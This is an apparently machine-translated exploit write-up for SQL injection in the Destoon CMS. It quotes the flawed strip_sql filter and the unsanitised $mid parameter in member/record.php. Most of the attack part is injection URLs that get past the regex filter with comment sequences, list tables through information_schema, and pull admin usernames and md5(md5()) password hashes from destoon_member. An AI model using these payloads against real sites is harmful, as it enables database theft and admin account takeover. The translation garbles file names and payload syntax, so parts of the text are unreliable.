Destoon full-version SQL Injection

In include/global. func. php, The strip_ SQL function filters the passed values, but we can bypass this restriction to achieve full version injection.

function strip_sql($string) {     $search = array("/union[\s|\t]/i","/select[\s|\t]/i","/update[\s|\t]/i","/outfile[\s|\t]/i","/ascii/i","/[\s|\t]or[\s|\t]/i","/\/\*/i");     $replace = array('union ','select ','update ','outfile ','ascii ',' or ', '');     return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);   }

 

In member/record. php

<?php require 'config.inc.php'; require '../common.inc.php'; require DT_ROOT.'/module/'.$module.'/record.inc.php'; ?>

 

Call record. inc. php

switch($action) {     case 'pay':         $MODULE[-9]['name'] = $L['resume_name'];         $MODULE[-9]['islink'] = 0;         $MODULE[-9]['linkurl'] = $MODULE[9]['linkurl'];         isset($fromtime) or $fromtime = '';         isset($totime) or $totime = '';         isset($dfromtime) or $dfromtime = '';         isset($dtotime) or $dtotime = '';         isset($mid) or $mid = 0;         isset($currency) or $currency = '';         $module_select = module_select('mid', $L['module_name'], $mid);         if($keyword) $condition .= " AND title LIKE '%$keyword%'";         if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00'));         if($totime) $condition .= " AND paytime<".(strtotime($totime.' 23:59:59'));         if($mid) $condition .= " AND moduleid=$mid";         if($itemid) $condition .= " AND itemid=$itemid";   ....//

 

Among them, $ mid is not filtered, so we can inject but there is anti-injection processing in front? Let's see how we can bypass the regular expression xxx.com/member/record.php in the injection? Action = pay & mid =-1 + union // ***/select // ***/1, password, username, 5, 6, 7, 8, 9 from destoon_member where admin = 1 -- a to see if this is OK? In this way, the regular expression can be bypassed... Current. The prefix must have changed. I think xxx.com/member/record.php is used? Action = pay & mid =-1 + union // ***/select // ***/, GROUP_CONCAT (DISTINCT + table_name, 8, 9 + from + information_schema.columns + where + table_schema = database () -- % 20a to get the prefix. Then use xxx.com/member//record.php? Action = pay & mid =-1 + union // ***/select // ***/, concat (username, 0x3A, password, 8, 9% 20 from % 20destoon_member % 20 where % 20 admin = 1 -- % 20a to get the account and password. The ciphertext is md5 (md5 (psw) type, and the background looks like admin. php